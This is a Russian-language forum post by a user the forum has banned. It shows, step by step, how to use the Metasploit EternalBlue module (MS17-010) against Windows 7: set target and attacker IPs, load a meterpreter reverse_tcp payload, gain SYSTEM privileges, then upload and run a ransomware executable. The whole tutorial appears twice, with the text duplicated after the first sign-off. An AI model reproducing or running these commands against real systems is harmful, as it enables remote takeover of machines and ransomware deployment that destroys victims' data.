Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Всем привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.
В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.
Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.
Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.
> msfupdate
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105
> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21
> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
> msf exploit(ms17_010_eternalblue) >exploit
Эксплоит срабатывает на отлично, получаем системные привилегии:
> getsystem
> getuid
Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)
> upload /root/ransomware.exe C:\\
> shell
> cd C:\\
> ransomware.exe
И как итог:
Вот собственно, и все. Спасибо за внимание.

В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.
Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.
Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.
> msfupdate

> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105
> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21
> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
> msf exploit(ms17_010_eternalblue) >exploit

Эксплоит срабатывает на отлично, получаем системные привилегии:
> getsystem
> getuid

Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

> upload /root/ransomware.exe C:\\
> shell
> cd C:\\
> ransomware.exe

И как итог:

Вот собственно, и все. Спасибо за внимание.